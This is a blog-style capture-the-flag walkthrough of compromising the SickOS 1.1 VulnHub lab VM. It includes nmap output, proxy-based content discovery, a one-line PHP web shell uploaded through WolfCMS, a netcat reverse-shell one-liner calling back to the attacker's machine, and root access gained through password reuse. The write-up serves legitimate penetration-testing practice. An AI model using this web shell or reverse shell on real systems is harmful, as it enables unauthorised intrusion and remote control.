So I come across subreddit /r/oscp recently, I found a comment that suggest to practice to hack vulnhub VM before taking PWK course. One of the most recommended VM is SickOS. In this post I will try to explain how I hacked SickOS 1.1.
Scanning and Discovery
I configured SickOs VM network to host-only, so it has access to my machine.
First, I need to know the IP address of the target, I use netdiscover to do it, I set network interface as vboxnet0 same as SickOs
After running netdiscover, I found that the IP address is 192.168.56.101 then I run nmap, flag -sC means to run nmap script to target
$ nmap -sC 192.168.56.101 Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-13 22:04 WIB Nmap scan report for 192.168.56.101 Host is up (0.00038s latency). Not shown: 997 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA) | 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA) |_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA) 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:A7:85:FF (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds
There are 2 ports open, 22 and 3128. Port 3128 is squid http proxy server, and then I config my burp suite upstream proxy to 192.168.56.101:3128 to all destination host.
When I try to access 127.0.0.1, it gave me BLEHHH message, thats not my localhost so it must be SickOs localhost.
Furthermore, I run content discovery on burp and figure out there is directory named /wolfcms
So I visited /wolfcms
So I logged in as admin and got access to dashboard. I stroll around the dashboard then I found file manager feature, so I try to upload simple PHP backdoor.
Here is the code, I named it cmd.php
<?php system($_REQUEST['c']); ?>
PHP backdoor can be accessed in /public/ so I test using this request
the response was
I need to change method to POST, so I don’t have to URL encode my payload
And then I execute reverse shell that listen to 9999 using nc
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 9999 >/tmp/f
Finally I got reverse shell
Now that I have a limited shell, My goal is to escalate privileges to obtain a root access. I found there is database config and then try the password to check reused password to user sickos and I run sudo su to got root
Thats it! Finally I obtained root access and get the flag.